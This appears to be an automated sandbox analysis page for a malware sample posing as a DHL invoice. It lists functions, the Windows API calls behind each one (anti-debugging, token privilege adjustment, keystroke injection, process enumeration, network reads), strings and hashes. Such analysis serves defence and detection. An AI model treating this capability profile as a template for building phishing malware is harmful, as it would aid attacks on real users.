Opcode Fuzzy Hash: 5347e4da358eca34548c4d68295ac4be29339ef082366b830d4751c2b14d8c7b
Instruction Fuzzy Hash: F521A6317402129FDB208F1AD884B677FA5EF95315F19807EE8468B361CB79EC42CB99

Function 00408060 Relevance: 7.4, Strings: 5, Instructions: 1151COMMON

Download Yara Rule

Strings

VUUU, xrefs: 004083FA
VUUU, xrefs: 0040843C
ERCP, xrefs: 0040813C
VUUU, xrefs: 004083E8
VUUU, xrefs: 00445DF0

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID:
String ID: ERCP$VUUU$VUUU$VUUU$VUUU
API String ID: 0-1546025612
Opcode ID: 3458d5c8e35a5eb4d4abe9221a761b80d123fd2791c941d34f43bea1275577d0
Instruction ID: cfaa6e03878f45bc30a657fdf19458c7a45ef9019784888bbaa0b3c236211f0e
Opcode Fuzzy Hash: 3458d5c8e35a5eb4d4abe9221a761b80d123fd2791c941d34f43bea1275577d0
Instruction Fuzzy Hash: 0DA2BF70E0021ACBEF24CF58CA407AEB7B1BF55310F2581ABD855A7385EB789D81CB59

Function 00468298 Relevance: 6.6, APIs: 1, Strings: 3, Instructions: 568stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,?,?,00000000), ref: 004682AA

Strings

|, xrefs: 004682DA
(, xrefs: 004682F0
tbL, xrefs: 004684F4

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: lstrlen
String ID: ($tbL$|
API String ID: 1659193697-2980396599
Opcode ID: 53b3e5754b6068006e11b25e88e9c46f9786f92ca06542b0b3488b0abd307178
Instruction ID: 7c3d1f1d6e60aedeafb0bfd01292ff39ac576a8867c44a4da25a8b83af91c2c8
Opcode Fuzzy Hash: 53b3e5754b6068006e11b25e88e9c46f9786f92ca06542b0b3488b0abd307178
Instruction Fuzzy Hash: 0A323774A007059FCB28CF19C481A6AB7F0FF48710B15C56EE89ADB7A1EB74E981CB45

Function 0048A67C Relevance: 6.2, APIs: 4, Instructions: 175processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 0048A6AC
Process32FirstW.KERNEL32(00000000,?), ref: 0048A6BA

Part of subcall function 00409CB3: _wcslen.LIBCMT ref: 00409CBD

Process32NextW.KERNEL32(00000000,?), ref: 0048A79C
CloseHandle.KERNEL32(00000000), ref: 0048A7AB

Part of subcall function 0041CE60: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,00443303,?), ref: 0041CE8A

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
String ID:
API String ID: 1991900642-0
Opcode ID: 7dcc0cb43a4b69c08180481aca583503f1f849f862ff8363d9ed98e6823bf61d
Instruction ID: 2fb6e68db42923f4ef2dbf57205bcc35e8d348dbbe2b431b4c5cce30a2e3f606
Opcode Fuzzy Hash: 7dcc0cb43a4b69c08180481aca583503f1f849f862ff8363d9ed98e6823bf61d
Instruction Fuzzy Hash: 815150715083009FD710EF25C886A5FBBE8FF89758F00892EF985A7291EB74D904CB96

Function 0046AA57 Relevance: 6.1, APIs: 4, Instructions: 107keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 0046AAAC
SetKeyboardState.USER32(00000080), ref: 0046AAC8
PostMessageW.USER32(?,00000102,00000001,00000001), ref: 0046AB36
SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 0046AB88

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 2f9ea872fcd5b16b6c320691fed18c074195a392627c57f820666567241ad18b
Instruction ID: d6c7c82b2cb215497aa10c5a808ccb43316a8de1af06af0472ee38c67f59c034
Opcode Fuzzy Hash: 2f9ea872fcd5b16b6c320691fed18c074195a392627c57f820666567241ad18b
Instruction Fuzzy Hash: 88311E30A40A046EFB35CA65CC057FF77A6AB45710F04421BF281652D1E37D9DA1CB6B

Function 0047CE44 Relevance: 6.1, APIs: 4, Instructions: 75filenetworkCOMMON

Download Yara Rule

APIs

InternetReadFile.WININET(?,?,00000400,?), ref: 0047CE89
GetLastError.KERNEL32(?,00000000), ref: 0047CEEA
SetEvent.KERNEL32(?,?,00000000), ref: 0047CEFE

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: ErrorEventFileInternetLastRead
String ID:
API String ID: 234945975-0
Opcode ID: 3707b9c9ae3a207289ecf942033c06d8de7be24509dd88a896998beb2b0dedf8
Instruction ID: c40b4181ee2efc8aab5048ca8942e242746b3d8f2e06dc6c00c056ee98eefdf4
Opcode Fuzzy Hash: 3707b9c9ae3a207289ecf942033c06d8de7be24509dd88a896998beb2b0dedf8
Instruction Fuzzy Hash: 2221B0716007059FE730DFA5D984BA777FCEB10318F10842FE64A92291E778EE458B68

Function 00432622 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 0043271A
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00432724
UnhandledExceptionFilter.KERNEL32(?), ref: 00432731

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 9180bc1e0d4adcb3e56e733c61344fc6c4b54028a6dd9c7a72aec5ce681bd319
Instruction ID: 7a38b418b9f860c086cdc517caf7e31996ff0f82c80e1bf280a0a806f4ffcd45
Opcode Fuzzy Hash: 9180bc1e0d4adcb3e56e733c61344fc6c4b54028a6dd9c7a72aec5ce681bd319
Instruction Fuzzy Hash: 2431D574911228ABCB21DF65DD8979DB7B8BF18310F5041EAE80CA7261E7749F818F48

Function 004751CD Relevance: 4.6, APIs: 3, Instructions: 76COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 004751DA
GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00475238
SetErrorMode.KERNEL32(00000000), ref: 004752A1

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: ErrorMode$DiskFreeSpace
String ID:
API String ID: 1682464887-0
Opcode ID: 6902364949b2d7807722b0e5d9ab2f323de730a597aeec86adc4549c799d6072
Instruction ID: 6ef1684098f943dc999916600b65b7d91fa5241aab8e216c5f41f1ed8be4e899
Opcode Fuzzy Hash: 6902364949b2d7807722b0e5d9ab2f323de730a597aeec86adc4549c799d6072
Instruction Fuzzy Hash: 1B316F75A00518DFDB00DF54D8C4EADBBB4FF48318F0480AAE805AB392DB35E845CB55

Function 004616C3 Relevance: 4.6, APIs: 3, Instructions: 68COMMON

Download Yara Rule

APIs

Part of subcall function 0041FDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00420668
Part of subcall function 0041FDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00420685

LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0046170D
AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0046173A
GetLastError.KERNEL32 ref: 0046174A

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
String ID:
API String ID: 577356006-0
Opcode ID: 81c5be98c81557f5773b06dfddee4f81f10b46aca21fb959753ea4759e00b5f3
Instruction ID: bc7cfa38161a7c9c8966792a06d2b7d2c0a658b2a9dabc564d92e1320148404f
Opcode Fuzzy Hash: 81c5be98c81557f5773b06dfddee4f81f10b46aca21fb959753ea4759e00b5f3
Instruction Fuzzy Hash: 1311CEB2400304AFD718AF54ECC6DABB7B9EB04714B24852FE05653291EB74BC828B68

Function 0046D5EB Relevance: 4.6, APIs: 3, Instructions: 58fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0046D608
DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 0046D645
CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0046D650

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: CloseControlCreateDeviceFileHandle
String ID:
API String ID: 33631002-0
Opcode ID: a64bd305ea81324e51a1bd492d16af95e6b0a74186cd21d324060d9bd8ea620c
Instruction ID: 9cf142b5a91240cc45f4139159ef7cd91e4fccfca0fa27a343eaf3f9661dcb0e
Opcode Fuzzy Hash: a64bd305ea81324e51a1bd492d16af95e6b0a74186cd21d324060d9bd8ea620c
Instruction Fuzzy Hash: E5115E75E05228BFDB208F95DC85FAFBBBCEB45B50F108166F904E7290D6704A058BA6

Function 00461663 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON

Download Yara Rule

APIs

AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 0046168C
CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 004616A1
FreeSid.ADVAPI32(?), ref: 004616B1

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: AllocateCheckFreeInitializeMembershipToken
String ID:
API String ID: 3429775523-0
Opcode ID: 4a00d4538f4a05a87a9b86106f75b9d3a5b158a7f568ef3bb80f56e57e52c2db
Instruction ID: 0e9862e382fd7f3c7c80cc72a483831afada185aba4413ed44114177f31b515e
Opcode Fuzzy Hash: 4a00d4538f4a05a87a9b86106f75b9d3a5b158a7f568ef3bb80f56e57e52c2db
Instruction Fuzzy Hash: 87F0F475950309FBDB00DFE4DD89EAEBBBCEB08604F504566E501E2191E774AA448A54

Function 00424CE8 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(004328E9,?,00424CBE,004328E9,004C88B8,0000000C,00424E15,004328E9,00000002,00000000,?,004328E9), ref: 00424D09
TerminateProcess.KERNEL32(00000000,?,00424CBE,004328E9,004C88B8,0000000C,00424E15,004328E9,00000002,00000000,?,004328E9), ref: 00424D10
ExitProcess.KERNEL32 ref: 00424D22

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 5d8ae118f18770bba33106c795b06a97d98750d4dba6e5fd75aa60012db170f6
Instruction ID: fe90fd950eb08efbe530349c79327dd63b2599f04b4284c9dcc21481306f286a
Opcode Fuzzy Hash: 5d8ae118f18770bba33106c795b06a97d98750d4dba6e5fd75aa60012db170f6
Instruction Fuzzy Hash: 53E0B631110158AFCF21AF55EE4AA593B69EB95B85F50402AFC098B222CB39DD42CA98

Function 0043C2A2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 127COMMON

Download Yara Rule

Strings

/, xrefs: 0043C36C

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID:
String ID: /
API String ID: 0-2043925204
Opcode ID: 1f729ab8471c975a88b421826102304f1a6c61b9826944682b036adcf93c0e22
Instruction ID: 14c7fa559f5b4763ff171dda732297e2c54b28abf4a20cbe459c24970349e514
Opcode Fuzzy Hash: 1f729ab8471c975a88b421826102304f1a6c61b9826944682b036adcf93c0e22
Instruction Fuzzy Hash: 57415C769002186FCB20DFB9CC89EBB7778EB88314F1041AEF905D7280E6749D41CB58

Function 0045D27A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(?,?), ref: 0045D28C

Strings

X64, xrefs: 0045D2A8

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: NameUser
String ID: X64
API String ID: 2645101109-893830106
Opcode ID: 5ae9d3a5c223f98af8f624c997bceb394d8cbf493b0a2dfdf90e0dacfa383068
Instruction ID: 6673ed9d8e3918b7c14938a1278ac1c58549085a93c5f5605fffacb35cb33faf
Opcode Fuzzy Hash: 5ae9d3a5c223f98af8f624c997bceb394d8cbf493b0a2dfdf90e0dacfa383068
Instruction Fuzzy Hash: B6D0C9B480111DEFCB90CB90DCC8DDDB77CBB14305F1001A2F506A2000D77495498F25

Function 0042CAA0 Relevance: 3.5, APIs: 2, Instructions: 464COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
Instruction ID: a0d5f0f00030a5dacf01e29960c58ab36aaed1dbcef93d8d5a01d90ac0399c71
Opcode Fuzzy Hash: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
Instruction Fuzzy Hash: 72023C71E002299BDF14CFA9D9C06AEFBF1EF48314F65816AD819E7384D735AA41CB84

Function 0040CAF0 Relevance: 3.2, Strings: 2, Instructions: 659COMMON

Download Yara Rule

Strings

Variable is not of type 'Object'., xrefs: 00450C40
p#M, xrefs: 0040CF7F

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID:
String ID: Variable is not of type 'Object'.$p#M
API String ID: 0-1505659392
Opcode ID: fe54bd77857ea1937803d7f9e37cb6f65e923bf72e1bfcd8a191f8102bcad167
Instruction ID: 38d766a4293b3aa07483d6856ceb5ffcb9eb73abb101c86768fb291438b6ba99
Opcode Fuzzy Hash: fe54bd77857ea1937803d7f9e37cb6f65e923bf72e1bfcd8a191f8102bcad167
Instruction Fuzzy Hash: 19327C74900219DBDF14DF90C881AEEB7B5BF05308F24416BE806BB2D2D779AD4ACB59

Function 004768EE Relevance: 3.1, APIs: 2, Instructions: 57fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 00476918
FindClose.KERNEL32(00000000), ref: 00476961

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: cc119e9cb8d3ba5596bdb68c0d606dab488912ceaa58e861835c95aaf75134e1
Instruction ID: 92942087b29a5d91dd29e42cd07644915c47f19228977071f32efbc9528b55e8
Opcode Fuzzy Hash: cc119e9cb8d3ba5596bdb68c0d606dab488912ceaa58e861835c95aaf75134e1
Instruction Fuzzy Hash: D011B1B16046019FC710CF29C4C4A16BBE1EF84328F05C6AEE5699F7A2CB34EC05CB95

Function 004737B5 Relevance: 3.0, APIs: 2, Instructions: 33windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00484891,?,?,00000035,?), ref: 004737E4
FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,00484891,?,?,00000035,?), ref: 004737F4

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: a32bef480801aa5e4c810934379b6bc065fb17cd8c6182978b8547d15b8cff7c
Instruction ID: 2c5fbe7c2752015df322a2356125e26b958e5dd1351939e5ef290c0b02a942fb
Opcode Fuzzy Hash: a32bef480801aa5e4c810934379b6bc065fb17cd8c6182978b8547d15b8cff7c
Instruction Fuzzy Hash: 19F0EC716042142AE72017764C8DFDB775DDFC4765F004176F509D2291D5605D44C6B4

Function 0046B226 Relevance: 3.0, APIs: 2, Instructions: 29keyboardCOMMON

Download Yara Rule

APIs

SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 0046B25D
keybd_event.USER32(?,76C1C0D0,?,00000000), ref: 0046B270

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: InputSendkeybd_event
String ID:
API String ID: 3536248340-0
Opcode ID: d119593b4e5ebd584fa468a1e8ca90e3721e51bee6ae15b10dfa037ed15b2bfb
Instruction ID: 389103867b5a1a62c80a13fc494159a1aa3ff9a704fe43b7a758784a3dee98d5
Opcode Fuzzy Hash: d119593b4e5ebd584fa468a1e8ca90e3721e51bee6ae15b10dfa037ed15b2bfb
Instruction Fuzzy Hash: C6F06D7080428EABDB058FA0C805BAE7BB0FF04305F00805AF951A5192D37982019F99

Function 004610BF Relevance: 3.0, APIs: 2, Instructions: 24COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,004611FC), ref: 004610D4
CloseHandle.KERNEL32(?,?,004611FC), ref: 004610E9

Memory Dump Source

